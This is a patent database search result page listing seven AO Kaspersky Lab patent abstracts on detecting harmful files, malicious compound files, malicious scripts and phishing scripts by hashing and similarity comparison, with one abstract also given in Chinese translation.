-
公开(公告)号:US10013555B2
公开(公告)日:2018-07-03
申请号:US15182083
申请日:2016-06-14
申请人: AO Kaspersky Lab
摘要: Disclosed are method and system for detecting harmful files executed by a virtual stack machine. An example method includes: analyzing a file executable on the virtual stack machine to identify both parameters of a file section of the file and parameters of a function of the virtual stack machine when executing the file; identifying, in a database, at least one cluster of safe files based on the identified parameters of the file section of the file and the identified parameters of the virtual stack machine; creating, using at least one clustering rule, a data cluster based on the identified at least one cluster of safe files; calculating at least one checksum of the created data cluster; and determining that the file executable on the virtual stack machine is harmful if the computed at least one checksum matches a checksum in a database of checksums of harmful files.
-
公开(公告)号:US20180101682A1
公开(公告)日:2018-04-12
申请号:US15411132
申请日:2017-01-20
申请人: AO Kaspersky Lab
IPC分类号: G06F21/56
CPC分类号: G06F21/565
摘要: A method and system is provided for detecting malicious compound files. An example method includes: obtaining at least one compound file; identifying a first set of features of the at least one compound file including features associated with a header of the at least one compound file; subsequent to identifying the first set of features, identifying, by the processor, a second set of features of the at least one compound file including features associated with at least one directory of the at least one compound file; determining a hash sum of the at least one compound file based on the first and second set of features; comparing the hash sum of the at least one compound file with information associated with a plurality of compound files stored in a database; and identifying the at least one compound file as being malicious, trusted or untrusted based at least on comparison results.
-
公开(公告)号:US09648032B2
公开(公告)日:2017-05-09
申请号:US15062455
申请日:2016-03-07
申请人: AO Kaspersky Lab
CPC分类号: H04L63/1416 , G06F21/51 , G06F21/563 , G06F2221/2101 , H04L63/1425
摘要: Disclosed are exemplary aspects of systems and methods for blocking execution of scripts. An exemplary method comprises: intercepting a request for a script from a client to a server; generating a bytecode of the intercepted script; computing a hash sum of the generated bytecode; determining a degree of similarity between the hash sum of the bytecode and a plurality of hash sums of malicious and clean scripts stored in a database; identifying a similar hash sum from the database whose degree of similarity with the hash sum of the bytecode is within a threshold of similarity; determining a coefficient of trust of the similar hash sum; determining whether the requested script is malicious based on the degree of similarity and the coefficient of trust of the similar hash sum; and blocking the execution of the malicious script on the client.
-
公开(公告)号:US10339312B2
公开(公告)日:2019-07-02
申请号:US15411132
申请日:2017-01-20
申请人: AO Kaspersky Lab
IPC分类号: G06F21/56
摘要: A method and system is provided for detecting malicious compound files. An example method includes: obtaining at least one compound file; identifying a first set of features of the at least one compound file including features associated with a header of the at least one compound file; subsequent to identifying the first set of features, identifying, by the processor, a second set of features of the at least one compound file including features associated with at least one directory of the at least one compound file; determining a hash sum of the at least one compound file based on the first and second set of features; comparing the hash sum of the at least one compound file with information associated with a plurality of compound files stored in a database; and identifying the at least one compound file as being malicious, trusted or untrusted based at least on comparison results.
-
5.发明申请SYSTEM AND METHOD FOR DETECTING HARMFUL FILES EXECUTABLE ON A VIRTUAL STACK MACHINE BASED ON PARAMETERS OF THE FILES AND THE VIRTUAL STACK MACHINE 有权基于文件参数和虚拟堆叠机检测虚拟堆叠机可执行的有害文件的系统和方法公开(公告)号:US20170004310A1
公开(公告)日:2017-01-05
申请号:US15182083
申请日:2016-06-14
申请人: AO Kaspersky Lab
CPC分类号: G06F21/565 , G06F9/45558 , G06F17/30233 , G06F17/30598 , G06F21/56 , G06F2009/45587 , G06F2221/033 , G06F2221/034
摘要: Disclosed are method and system for detecting harmful files executed by a virtual stack machine. An example method includes: analyzing a file executable on the virtual stack machine to identify both parameters of a file section of the file and parameters of a function of the virtual stack machine when executing the file; identifying, in a database, at least one cluster of safe files based on the identified parameters of the file section of the file and the identified parameters of the virtual stack machine; creating, using at least one clustering rule, a data cluster based on the identified at least one cluster of safe files; calculating at least one checksum of the created data cluster; and determining that the file executable on the virtual stack machine is harmful if the computed at least one checksum matches a checksum in a database of checksums of harmful files.
摘要翻译: 公开了用于检测由虚拟堆栈机执行的有害文件的方法和系统。 示例性方法包括:在执行文件时,分析虚拟堆栈机器上的文件可执行文件以识别文件的文件部分的参数和虚拟堆栈机器的功能的参数; 基于所述文件的文件部分的所识别的参数和所述虚拟堆叠机的所识别的参数,在数据库中识别至少一组安全文件; 基于所识别的至少一个安全文件簇来创建使用至少一个聚类规则的数据集群; 计算所创建的数据集群的至少一个校验和; 并且如果所计算的至少一个校验和与有害文件的校验和的数据库中的校验和匹配,则确定虚拟堆栈机器上的可执行文件是有害的。
-
公开(公告)号:US20170093893A1
公开(公告)日:2017-03-30
申请号:US15062455
申请日:2016-03-07
申请人: AO Kaspersky Lab
IPC分类号: H04L29/06
CPC分类号: H04L63/1416 , G06F21/51 , G06F21/563 , G06F2221/2101 , H04L63/1425
摘要: Disclosed are exemplary aspects of systems and methods for blocking execution of scripts. An exemplary method comprises: intercepting a request for a script from a client to a server; generating a bytecode of the intercepted script; computing a hash sum of the generated bytecode; determining a degree of similarity between the hash sum of the bytecode and a plurality of hash sums of malicious and clean scripts stored in a database; identifying a similar hash sum from the database whose degree of similarity with the hash sum of the bytecode is within a threshold of similarity; determining a coefficient of trust of the similar hash sum; determining whether the requested script is malicious based on the degree of similarity and the coefficient of trust of the similar hash sum; and blocking the execution of the malicious script on the client.
-
公开(公告)号:US09497218B1
公开(公告)日:2016-11-15
申请号:US15062715
申请日:2016-03-07
申请人: AO Kaspersky Lab
CPC分类号: H04L63/1483 , G06F21/562
摘要: Disclosed are exemplary aspects of systems and methods for detection of phishing scripts. An exemplary method comprises: generating a bytecode of a script; computing a hash sum of the generated bytecode; determining a degree of similarity between the hash sum of the bytecode and hash sums in one or more groups of hash sums of known phishing scripts; identifying at least one group of hash sums that contains a hash sum whose degree of similarity with the hash sum of the bytecode is within a threshold; determining a coefficient of compactness of the identified group of hash sums and a coefficient of trust of the identified group of hash sums; and determining whether the script is a phishing script based on the degree of similarity, the coefficient of compactness and the coefficient of trust.
摘要翻译: 公开了用于检测网络钓鱼脚本的系统和方法的示例性方面。 示例性方法包括:生成脚本的字节码; 计算生成的字节码的哈希和; 确定所述字节码的散列和与已知网络钓鱼脚本的一组或多组散列和中的散列和之间的相似程度; 识别至少一组散列和,其包含与所述字节代码的散列和的相似程度在阈值内的散列和; 确定所识别的散列和的组的紧凑系数和所识别的散列和的组的信任系数; 并且基于相似度,紧密度系数和信任系数来确定脚本是否是网络钓鱼脚本。
-
-
-
-
-
-
搜索结果
7 条记录 (耗时 0.011 秒)
